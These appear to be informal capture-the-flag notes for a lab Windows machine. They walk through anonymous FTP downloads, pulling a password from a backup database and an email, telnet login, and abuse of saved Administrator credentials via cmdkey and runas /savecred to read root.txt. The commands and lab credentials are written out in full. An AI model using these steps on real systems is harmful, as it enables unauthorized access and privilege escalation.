RunAs

Allows us to run command as somebody else

Looking for this command (stored credentials on a machine):

cmdkey /list

Access Machine:

ftp:

ftp 10.10.10.98
anonymous
anonymous

Switch FTP from ASCII to Binary:

binary

Commands to h5a on FTP:

recurse on #no idea what this does
cd backups
ls
get backup.mdb
cd ..
cd engineer
ls
get "Access Control.zip" #this won't work without double quotes because of the space

These files are in Downloads folder (I found them in kali/~ not Downloads)

PST file is email.

• Read with readpst

readpst "access control.pst"

mdb is a database file.

• Read with mdb-sql

mdb-sql backup.mdb

NOTE: Just copy them over to Windows and open them with Microsoft stuff

Database had password for zip in “auth” table

Email:

Hi there,

The password for the “security” account has been changed to 4Cc3ssC0ntr0ller.  Please ensure this is passed on to your engineers.

Regards,
John

New user:

security:4Cc3ssC0ntr0ller

Telnet into machine with the new user:

telnet -l security 10.10.10.98
4Cc3ssC0ntr0ller

From here, we can enum with automated tools like winpeas or Powershell

We can go browse around to see what’s on the computer

To check stored credentials on a machine:

cmdkey /list

result:

We can run RunAs (built-in) to copy a file’s content (using TYPE then saving output to a txt) from admin folder to our user folder:

C:\Windows\System32\runas.exe /user:ACCESS\Administrator /savecred "C:\Windows\System32\cmd.exe /c TYPE c:\Users\Administrator\Desktop\root.txt > C:\Users\security\root.txt"

RunAs is kinda like Sudo